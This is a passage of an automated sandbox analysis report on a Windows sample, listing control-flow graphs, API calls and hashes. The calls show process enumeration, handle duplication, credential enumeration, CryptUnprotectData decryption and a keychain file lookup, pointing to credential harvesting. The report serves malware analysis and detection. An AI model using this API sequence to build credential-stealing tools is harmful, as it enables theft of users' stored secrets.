DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040DDAD
                                                                          • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                          • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                        • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                        • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                        • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                        • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                        • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                        • _wcsicmp.MSVCRT ref: 0040DED8
                                                                        • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                        • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                        • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                        • memset.MSVCRT ref: 0040DF5F
                                                                        • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                        • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                        • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                        • String ID: dllhost.exe$p+v@Fv@Bv$taskhost.exe$taskhostex.exe
                                                                        • API String ID: 708747863-3857311822
                                                                        • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                        • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                        • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                        • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 772 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 775 413f00-413f11 Process32NextW 772->775 776 413da5-413ded OpenProcess 775->776 777 413f17-413f24 CloseHandle 775->777 778 413eb0-413eb5 776->778 779 413df3-413e26 memset call 413f27 776->779 778->775 781 413eb7-413ebd 778->781 787 413e79-413e9d call 413959 call 413ca4 779->787 788 413e28-413e35 779->788 782 413ec8-413eda call 4099f4 781->782 783 413ebf-413ec6 free 781->783 785 413edb-413ee2 782->785 783->785 792 413ee4 785->792 793 413ee7-413efe 785->793 799 413ea2-413eae CloseHandle 787->799 790 413e61-413e68 788->790 791 413e37-413e44 GetModuleHandleW 788->791 790->787 796 413e6a-413e76 790->796 791->790 795 413e46-413e5c GetProcAddress 791->795 792->793 793->775 795->790 796->787 799->778
                                                                        APIs
                                                                          • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                        • memset.MSVCRT ref: 00413D7F
                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                        • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                        • memset.MSVCRT ref: 00413E07
                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                        • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                        • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                        • free.MSVCRT ref: 00413EC1
                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                        • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                        • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                        • API String ID: 1344430650-1740548384
                                                                        • Opcode ID: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                        • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                        • Opcode Fuzzy Hash: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                        • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 891 40b58d-40b59e 892 40b5a4-40b5c0 GetModuleHandleW FindResourceW 891->892 893 40b62e-40b632 891->893 894 40b5c2-40b5ce LoadResource 892->894 895 40b5e7 892->895 894->895 896 40b5d0-40b5e5 SizeofResource LockResource 894->896 897 40b5e9-40b5eb 895->897 896->897 897->893 898 40b5ed-40b5ef 897->898 898->893 899 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 898->899 899->893
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                                                        • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                        • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                        • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                        • String ID: AE$BIN
                                                                        • API String ID: 1668488027-3931574542
                                                                        • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                        • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                        • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                        • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                        APIs
                                                                        • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                        • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                                        • String ID:
                                                                        • API String ID: 767404330-0
                                                                        • Opcode ID: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                                                        • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                        • Opcode Fuzzy Hash: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                                                        • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                        APIs
                                                                        • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                        • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: FileFind$FirstNext
                                                                        • String ID:
                                                                        • API String ID: 1690352074-0
                                                                        • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                        • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                        • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                        • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                        APIs
                                                                        • memset.MSVCRT ref: 0041898C
                                                                        • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: InfoSystemmemset
                                                                        • String ID:
                                                                        • API String ID: 3558857096-0
                                                                        • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                        • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                        • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                        • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 40 44558e-445594 call 444b06 4->40 41 44557e-44558c call 4136c0 call 41366b 4->41 19 4455e5 5->19 20 4455e8-4455f9 5->20 10 445800-445809 6->10 11 445856-44585f 10->11 12 44580b-44581e call 40a889 call 403e2d 10->12 15 445861-445874 call 40a889 call 403c9c 11->15 16 4458ac-4458b5 11->16 42 445823-445826 12->42 49 445879-44587c 15->49 21 44594f-445958 16->21 22 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 16->22 19->20 23 445672-445683 call 40a889 call 403fbe 20->23 24 4455fb-445601 20->24 35 4459f2-4459fa 21->35 36 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 21->36 135 44592d-445945 call 40b6ef 22->135 136 44594a 22->136 84 445685 23->84 85 4456b2-4456b5 call 40b1ab 23->85 29 445605-445607 24->29 30 445603 24->30 29->23 38 445609-44560d 29->38 30->29 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 35->44 45 445b29-445b32 35->45 153 4459d0-4459e8 call 40b6ef 36->153 154 4459ed 36->154 38->23 48 44560f-445641 call 4087b3 call 40a889 call 4454bf 38->48 40->3 41->40 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 150 445665-445670 call 40b1ab 48->150 151 445643-445663 call 40a9b5 call 4087b3 48->151 64 4458a2-4458aa call 40b1ab 49->64 65 44587e 49->65 51->11 67 44582e-445847 call 40a9b5 call 4087b3 52->67 61 445d1c-445d25 53->61 62 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->62 68 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->68 69 445b98-445ba0 54->69 73 445fae-445fb2 61->73 74 445d2b-445d3b 61->74 168 445cf5 62->168 169 445cfc-445d03 62->169 64->16 81 445884-44589d call 40a9b5 call 4087b3 65->81 138 445849 67->138 247 445c77 68->247 69->68 83 445ba2-445bcf call 4099c6 call 445403 call 445389 69->83 90 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 74->90 91 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 74->91 156 44589f 81->156 83->53 100 44568b-4456a4 call 40a9b5 call 4087b3 84->100 104 4456ba-4456c4 85->104 162 445d67-445d6c 90->162 163 445d71-445d83 call 445093 90->163 196 445e17 91->196 197 445e1e-445e25 91->197 158 4456a9-4456b0 100->158 118 4457f9 104->118 119 4456ca-4456d3 call 413cfa call 413d4c 104->119 118->6 172 4456d8-4456f7 call 40b2cc call 413fa6 119->172 135->136 136->21 138->51 150->104 151->150 153->154 154->35 156->64 158->85 158->100 174 445fa1-445fa9 call 40b6ef 162->174 163->73 168->169 179 445d05-445d13 169->179 180 445d17 169->180 206 4456fd-445796 memset * 4 call 409c70 * 3 172->206 207 4457ea-4457f7 call 413d29 172->207 174->73 179->180 180->61 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 206->207 246 445798-4457ca call 40b2cc call 409d1f call 409b98 206->246 207->10 218->73 253 445f9b 218->253 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->207 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 253->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                        APIs
                                                                        • memset.MSVCRT ref: 004455C2
                                                                        • wcsrchr.MSVCRT ref: 004455DA
                                                                        • memset.MSVCRT ref: 0044570D
                                                                        • memset.MSVCRT ref: 00445725
                                                                          • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                          • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                          • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                          • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                          • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                          • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                          • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                          • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                        • memset.MSVCRT ref: 0044573D
                                                                        • memset.MSVCRT ref: 00445755
                                                                        • memset.MSVCRT ref: 004458CB
                                                                        • memset.MSVCRT ref: 004458E3
                                                                        • memset.MSVCRT ref: 0044596E
                                                                        • memset.MSVCRT ref: 00445A10
                                                                        • memset.MSVCRT ref: 00445A28
                                                                        • memset.MSVCRT ref: 00445AC6
                                                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                          • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                          • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                          • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                          • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                          • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                        • memset.MSVCRT ref: 00445B52
                                                                        • memset.MSVCRT ref: 00445B6A
                                                                        • memset.MSVCRT ref: 00445C9B
                                                                        • memset.MSVCRT ref: 00445CB3
                                                                        • _wcsicmp.MSVCRT ref: 00445D56
                                                                        • memset.MSVCRT ref: 00445B82
                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                          • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                          • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                          • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                          • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                        • memset.MSVCRT ref: 00445986
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                        • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                        • API String ID: 1963886904-3798722523
                                                                        • Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                        • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                        • Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                        • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                          • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                          • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                          • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                        • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                                                        • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                                                        • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                        • String ID: $/deleteregkey$/savelangfile
                                                                        • API String ID: 2744995895-28296030
                                                                        • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                        • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                        • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                        • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 393 431a7b-431a9d 394 431aa3-431aa9 393->394 395 43210b-432137 call 42c02e call 4325ad call 4158f6 393->395 394->395 397 431aaf-431ab8 call 43817e 394->397 397->395 402 431abe-431ac3 397->402 404 431b33-431b3e 402->404 405 431ac5-431adc call 43041c 402->405 404->395 407 431b44-431b52 call 43824b 404->407 405->395 413 431ae2-431af8 call 42fac6 405->413 414 431b55-431b7a call 416a7d 407->414 419 431b06-431b1f call 42ff8c 413->419 420 431afa-431b05 call 42faf4 413->420 421 431baa-431bae 414->421 422 431b7c-431b93 memcmp 414->422 419->395 434 431b25-431b2c 419->434 420->419 428 431bb0 421->428 429 431bbe-431bc2 421->429 422->421 425 431b95-431b97 422->425 433 431b9c-431ba3 call 4169a7 425->433 430 431bb5-431bbc call 4169a7 428->430 431 431bc4-431bc9 429->431 432 431bcb-431bcf 429->432 444 431ba4-431ba5 430->444 431->430 437 431bd1-431be1 call 43034a 432->437 438 431c45-431c4b 432->438 433->444 434->414 435 431b2e 434->435 435->395 437->395 448 431be7-431bf2 call 430468 437->448 442 431c51-431c53 438->442 446 431c55-431c6d call 4165ff 442->446 447 431c4d-431c50 442->447 444->395 446->395 453 431c73-431c78 446->453 447->442 448->395 454 431bf8-431bfe 448->454 455 431cc7-431ccb 453->455 456 431c7a-431ca8 call 41691b call 42bf4c 453->456 459 431c00-431c0d call 42ff13 454->459 460 431c1c-431c2c call 42fffc 454->460 457 431cf6-431d21 call 41691b call 415a91 455->457 458 431ccd-431cd0 455->458 456->395 480 431cae-431cc5 call 42bfcf 456->480 483 4320f0-4320f2 457->483 484 431d27-431da2 memcpy 457->484 464 431cd2-431cd6 458->464 473 431c19 459->473 474 431c0f-431c17 459->474 460->453 477 431c2e-431c32 460->477 470 431cf0-431cf4 464->470 471 431cd8-431cdd 464->471 470->457 470->464 471->470 478 431cdf-431ced call 41691b 471->478 473->460 474->433 477->395 481 431c38-431c40 477->481 478->470 480->455 481->433 483->395 487 4320f4-432108 call 4158f6 * 2 483->487 488 431e97-431eaa call 432154 484->488 489 431da8-431dbf 484->489 487->395 502 431eb0-431eb3 488->502 503 431f3c-431f43 488->503 492 431dc1-431dd0 call 416a42 489->492 493 431de4-431def 489->493 492->493 510 431dd2-431de2 492->510 498 431df5-431e02 493->498 499 431eb8-431ed4 call 4169a7 493->499 504 431e31-431e43 498->504 505 431e04-431e09 498->505 499->483 511 431f38-431f3a 502->511 512 431fc3-431fd9 call 4397fd 503->512 513 431f45-431f56 call 41691b call 4172c8 503->513 507 431e50-431e57 504->507 508 431e45-431e4d 504->508 505->504 514 431e0b-431e2f call 41691b memcpy 505->514 516 431e59-431e67 call 430af5 507->516 517 431e6d-431e91 507->517 508->507 510->492 510->493 511->503 518 